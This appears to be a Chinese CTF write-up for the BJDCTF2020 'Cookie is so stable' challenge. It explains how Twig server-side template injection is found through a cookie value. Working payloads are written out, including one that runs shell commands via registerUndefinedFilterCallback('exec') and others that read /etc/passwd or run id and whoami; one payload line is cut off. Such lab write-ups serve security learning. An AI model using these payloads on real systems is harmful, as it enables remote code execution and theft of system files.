[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)

目录

信息收集

hint页面

flag页面

命令执行 

reference


信息收集

hint页面

flag页面

输入任意内容(这里输入admin)

这里第一反应是cookie类的SQL注入?但是发现这里其实并没有实现查询信息的功能,只是将输入的内容进行打印,看下前端源码,可能是SSTI!

修改cookie

${7*7}----------{{7*7}}---------{{7*'7'}}

 确认是SSTI(PHP),根据上文的流程表判定类型是Twig

[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)_第1张图片

[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)_第2张图片

在 Twig 模板中可以直接调用函数,用于生产内容。如下调用了 range()函数用来返回一个包含整数等差数列的列表:

{% for i in range(0, 3) %}{{ i }},{% endfor %}

在twig 1.x版本,存在三个全局变量

  • _self:引用当前模板实例

  • _context:引用上下文

  • _charset:引用当前字符集

命令执行 

payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

这里可以直接修改cookie,因为直接提交会被拦截

当然flag在根目录下是猜的,我们使用命令返回的结果只有第一项

一些新版本的payload

{{'/etc/passwd'|file_excerpt(1,30)}}

{{app.request.files.get(1).__construct('/etc/passwd','')}}

{{app.request.files.get(1).openFile.fread(99)}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

{{_self.env.enableDebug()}}{{_self.env.isDebug()}}

{{["id"]|map("system")|join(",")

{{{"

reference

https://xz.aliyun.com/t/7518#toc-5

https://www.freebuf.com/articles/web/314028.html

https://www.cnblogs.com/bmjoker/p/13508538.html

[BJDCTF2020]Cookie is so stable | 信安小蚂蚁

你可能感兴趣的:(web安全,php,web安全,网络安全,安全,开发语言)